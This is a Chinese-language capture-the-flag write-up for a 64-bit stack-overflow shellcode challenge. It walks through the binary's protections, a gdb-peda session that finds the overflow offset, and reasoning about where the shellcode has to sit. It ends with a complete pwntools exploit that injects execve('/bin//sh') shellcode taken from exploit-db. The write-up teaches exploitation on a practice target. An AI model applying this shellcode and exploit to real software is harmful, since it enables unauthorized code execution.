sniperoj-pwn100-shellcode-x86-64

题目地址：sniperoj-pwn100-shellcode-x86-64

1.基本信息收集

查看文件信息：

file shellcode
shellcode: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=4600df3dbafbffc6436a38e95b386fc8afbbd63b, not stripped

查看保护：

ida查看反汇编：

2.漏洞定位及分析

由上图可知，可以覆盖的空间大小为0x40，buf大小为0x10.

题目没有发现system函数与“/bin/sh”字符串，且没有开启堆栈不可执行的保护，因此我们可以采用直接写入shellcode的方法。

由于：

我们平常所用的shellcode长度太长，需要更换短一点的shellcode。

下面是两个可以去搜寻shllcode的网址：

https://www.exploit-db.com/shellcodes
http://shell-storm.org/shellcode/

本题用的shellcode是这里找到的：https://www.exploit-db.com/shellcodes/46907

shellcode=”\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05”

接下来应该考虑的是要把shellcode放在那个位置，如果按劫持栈指针的方法，把因为空间不大，可以把shellcoe放在最开头，然后控制程序流跳转执行shellcode。但是本题不可以。原因如下图：

leave的作用相当于MOV SP,BP；POP BP。

而shellcode中对sp进行了push操作，所以leave指令会对shellcode的执行造成影响。所以buf中不能存放shellcode，buf后的8个字节也不能存放（这里需要存放返回地址）。

所以，我们的shellcode只能放在buf首地址后的0x10+8后的地址。

3.利用步骤

下面是栈溢出的基本套路：

1.计算偏移量

gdb-peda$ pattern create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /home/hc/study/pwn/stackoverflow/Ret2shellcode/sniperoj-pwn100-shellcode-x86-64/shellcode 
Welcome to Sniperoj!
Do your kown what is it : [0x7fffffffdbb0] ?
Now give me your answer : 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7af4081 (<__GI___libc_read+17>: cmp    rax,0xfffffffffffff000)
RDX: 0x40 ('@')
RSI: 0x7fffffffdbb0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
RDI: 0x0 
RBP: 0x41412d4141434141 ('AACAA-AA')
RSP: 0x7fffffffdbc8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
RIP: 0x555555554852 (<main+130>:    ret)
R8 : 0x7ffff7fdf4c0 (0x00007ffff7fdf4c0)
R9 : 0x0 
R10: 0x3 
R11: 0x246 
R12: 0x5555555546a0 (<_start>:  xor    ebp,ebp)
R13: 0x7fffffffdca0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555554847 <main+119>:   call   0x555555554670 <read@plt>
   0x55555555484c <main+124>:   mov    eax,0x0
   0x555555554851 <main+129>:   leave  
=> 0x555555554852 <main+130>:   ret    
   0x555555554853:  nop    WORD PTR cs:[rax+rax*1+0x0]
   0x55555555485d:  nop    DWORD PTR [rax]
   0x555555554860 <__libc_csu_init>:    push   r15
   0x555555554862 <__libc_csu_init+2>:  push   r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdbc8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
0008| 0x7fffffffdbd0 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
0016| 0x7fffffffdbd8 ("AA0AAFAAbAA1AAGAAcAA2AAH")
0024| 0x7fffffffdbe0 ("bAA1AAGAAcAA2AAH")
0032| 0x7fffffffdbe8 ("AcAA2AAH")
0040| 0x7fffffffdbf0 --> 0x0 
0048| 0x7fffffffdbf8 --> 0x7f5085ea1bc1eb88 
0056| 0x7fffffffdc00 --> 0x5555555546a0 (<_start>:  xor    ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000555555554852 in main ()
gdb-peda$ pattern offset (AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH
(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH found at offset: 24

2.编写exp

from pwn import *

p = process('./shellcode')

shellcode = '\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
p.recvuntil('[')
buf_addr = p.recvuntil(']',drop=True)
p.recv()
#print type(buf_addr)

payload = 'A'*24 + p64(int(buf_addr,16) + 32) + shellcode

p.sendline(payload)
p.interactive()